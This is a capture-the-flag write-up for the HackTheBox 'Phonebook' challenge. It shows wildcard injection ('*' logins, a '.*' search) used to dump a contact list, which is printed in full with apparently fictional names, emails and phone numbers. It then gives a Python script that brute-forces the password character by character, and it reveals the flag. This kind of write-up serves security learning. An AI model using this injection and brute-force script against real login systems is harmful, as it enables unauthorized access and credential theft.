Phonebook

Date: 13, May, 2021

Author: Dhilip Sanjay S

---

Initial Recon

• Initially I couldn't find the username and password for login. So, I was looking for someother endpoint other than login.

• I was able to find two other enpoints:

  • 964430b4cdd199af19b986eaf2193b21f32542d0

  • search

Access Denied

• The 964430b4cdd199af19b986eaf2193b21f32542d0 page had a search box, which made a POST request to the search endpoint. But it kept on returning Access Denied - 403 Error message.

Dumping all the contacts in the phonebook

Login with wild card character (*)

• On entering the username and password as a wildcard character (*), I was able to login into the site.

Search using regex (.*)

• Now in the search box, I tried the same wildcard character, but it didn't work.

• So, I used the regex that matches any string .*, which gave me the following output:

Kyle Reese	reese@skynet.com	555-1234567
Ellery Hun	ehun1z@reddit.com	317-959-9562
Madelaine Lush	mlush5@deliciousdays.com	636-918-1006
Currey Conti	cconti0@auda.org.au	529-673-3935
Chaim Smoth	csmothf@sbwire.com	895-974-4117
Eldin Jelf	ejelf1u@google.pl	363-426-3563
Ganny Marti	gmartih@diigo.com	796-793-6925
Jobey Olley	jolleyx@abc.net.au	607-345-0290
Katalin Wilde	kwildep@plala.or.jp	414-839-2681
Stinky Trood	stroodz@foxnews.com	933-416-1003
Tab Zoren	tzorenq@mit.edu	360-678-3613
Ursula Beer	ubeer2f@live.com	794-396-6882
Bryan Arman	barman1x@exblog.jp	640-255-8092
Babette Cunio	bcunio2h@macromedia.com	709-363-0223
Berget Novis	bnovis1j@constantcontact.com	780-278-2572
Ced Engley	cengleyi@springer.com	230-780-1999
Caryn Germon	cgermon4@wiley.com	967-789-6335
Devina Alcide	dalcideu@arizona.edu	828-947-3484
Dionne Lammas	dlammask@washingtonpost.com	824-561-5676
Emmalynn Burnup	eburnupd@networkadvertising.org	148-856-7052
Fredericka Hanks	fhanks1s@census.gov	762-337-5667
Hannah Inder	hinder2a@canalblog.com	315-711-6454
Jay Sharma	jsharmay@t.co	893-382-5236
Lilyan Crepel	lcrepel6@ucoz.com	851-980-1038
Nevile Cogle	ncogle27@answers.com	296-328-0254
Pansy Godier	pgodiero@google.ca	126-853-7977
Rubetta Bernth	rbernthc@biglobe.ne.jp	897-680-2856
Renelle Hyett	rhyett11@google.pl	453-475-9693
Saul Haill	shaill1q@omniture.com	654-478-5757
Stephanus Massot	smassot2@army.mil	717-500-2025
Sarah Moyes	smoyes2e@bing.com	747-445-4381
Sig Tanby	stanby2c@google.es	212-473-4506
Shepherd Tunuy	stunuy2d@spotify.com	293-455-5209
Teddy Bilby	tbilby1r@cornell.edu	357-669-5415
Taylor Capsey	tcapseyl@yahoo.co.jp	118-956-5884
Teddie Redley	tredleye@java.com	658-361-4791
Abagael Guidera	aguideras@barnesandnoble.com	857-685-9711
Arv Teresse	ateresse3@samsung.com	916-453-1626
Bert Father	bfather1v@cnet.com	131-343-2704
Bart McNess	bmcness20@wordpress.com	644-208-9958
Corinne Tirone	ctirone1y@nbcnews.com	572-971-8847
Denny Ashmole	dashmole7@telegraph.co.uk	345-974-0984
Elenore Puttick	eputtickv@newyorker.com	525-705-9780
Frederigo Itzkov	fitzkov1a@amazon.com	681-753-0881
Jessamyn Trusty	jtrusty2i@seesaa.net	423-494-9425
Jamison Vigurs	jvigurs1b@slideshare.net	161-478-7335
Michal Fearby	mfearby2k@ftc.gov	844-581-6099
Mellicent Pessolt	mpessolt8@freewebs.com	735-651-5726
Terencio Ducarne	tducarne9@homestead.com	831-135-9972
Trev Simmers	tsimmersm@phoca.cz	378-186-4422
Aubrey Castille	acastiller@homestead.com	930-681-1706
Andria Gossage	agossage24@wsj.com	184-389-0446
Ansell Shovlin	ashovlin16@blogspot.com	329-311-4183
Ahmed Swyndley	aswyndley1@blinklist.com	954-829-5270
Bay Gregori	bgregori2n@baidu.com	791-721-1297
Charlie Prangle	cprangle2b@shinystat.com	869-131-2435
Dianna Chesser	dchesser10@angelfire.com	901-185-5817
Denna Duplain	dduplain19@springer.com	884-899-2850
Davidson Ibotson	dibotson2m@dedecms.com	709-535-0126
Enid Halbord	ehalbord1k@blogspot.com	318-313-2200
Eimile Pantlin	epantlin1c@admin.ch	690-650-9785
Fina Bonsale	fbonsale1h@meetup.com	631-592-3171
Ives Harvatt	iharvatt1l@hubpages.com	606-103-7270
Jehanna Langmaid	jlangmaidn@themeforest.net	171-550-7961
Karlee Christal	kchristalw@sourceforge.net	354-231-8489
Koo Hansill	khansill25@sourceforge.net	114-439-3748
Kimberley Mourant	kmourant1d@ft.com	792-338-9852
Moll Linster	mlinster17@parallels.com	704-145-7925
Sabra Brumham	sbrumham12@wordpress.com	222-509-0396
Scottie Bucknell	sbucknellg@dagondesign.com	765-181-5301
Stewart Currier	scurrier2r@businessweek.com	480-258-4237
Sollie Windham	swindham1f@squidoo.com	554-620-3103
Veda Lalonde	vlalonde1o@google.com.au	788-911-3962
Aguie Baggaley	abaggaley14@geocities.com	302-693-4223
April Roskelly	aroskelly2q@gravatar.com	177-474-9382
Burtie Bitcheno	bbitcheno29@ucla.edu	859-267-0856
Brunhilda Courtier	bcourtier2o@rakuten.co.jp	610-896-4215
Baxie Ellesmere	bellesmeret@furl.net	815-678-4391
Daryl Pond-Jones	dpondjonesj@gmpg.org	807-353-1751
Elyse Puckring	epuckring1n@dailymotion.com	619-569-7695
Glen Pickford	gpickford26@amazonaws.com	101-639-7455
Issi Coupland	icoupland23@myspace.com	943-625-5169
Joey Stienham	jstienham28@woothemes.com	214-853-1445
Marylee Parbrook	mparbrook1g@sbwire.com	872-906-8081
Reginauld Meggison	rmeggison22@behance.net	460-793-0851
Sybille Jephcott	sjephcott1e@yellowpages.com	454-950-9923
Siouxie Yesichev	syesichev1p@mashable.com	215-132-7221
Diana Moncreiff	dmoncreiff21@telegraph.co.uk	473-166-1352
Deane Shakelade	dshakelade2l@reuters.com	747-399-5336
Far Chansonne	fchansonne13@histats.com	215-579-4465
Ivett Danielczyk	idanielczyka@vk.com	777-574-2837
Johnette Vescovini	jvescovini1m@123-reg.co.uk	470-681-1859
Kary Thackeray	kthackeray1i@yellowpages.com	592-635-6851
Maris Giacopelo	mgiacopelo1w@networkadvertising.org	721-232-8735
Pascal Ainscough	painscough18@state.gov	202-416-7489
Valeda Purselowe	vpurselowe15@smugmug.com	407-245-6246
Allin de Glanville	adeglanvilleb@gov.uk	885-440-5379
Marty Chellenham	mchellenham2g@1und1.de	713-864-5942
Oneida Della Scala	odellascala1t@tuttocitta.it	472-913-8907
Vale O' Concannon	voconcannon2p@cdbaby.com	547-901-0162
Xavier Semeradova	xsemeradova2j@google.es	487-363-1619

• But wait, where is the flag??????

Finding the password/flag

• We'll try to find the password. My intuition is that the password might be the flag.

• We know that the wildcard character (*) will let us login. So, we can try to append some character before and after the wildcard character (*).

• So let's try * as the username and HTB{*} as the password, because this the flag format for HTB challenges.

• Now we are able to login. This confirms that the password is the flag.

• So we need some script to bruteforce the flag.

#!/usr/bin/env python3
import requests
import string

url = "http://138.68.182.108:30733/login"
leaked_pass = list("HTB{")

# Remove the wildcard character
printable = string.printable.replace('*', '')

while True:
	for character in printable:	
		print("Guessing " + ''.join(leaked_pass) + character + "*")
		r = requests.post(url, {"username":"*", "password": ''.join(leaked_pass) + character + "*"})
		#print(r.headers['Content-Length'])
		if r.headers['Content-Length'] == '2586':
			leaked_pass.append(character)
			break
			
	# End of the flag
	if leaked_pass[-1] == '}':
		exit()

Solution

• We get the password/flag as: HTB{d1rectory_h4xx0r_is_k00l}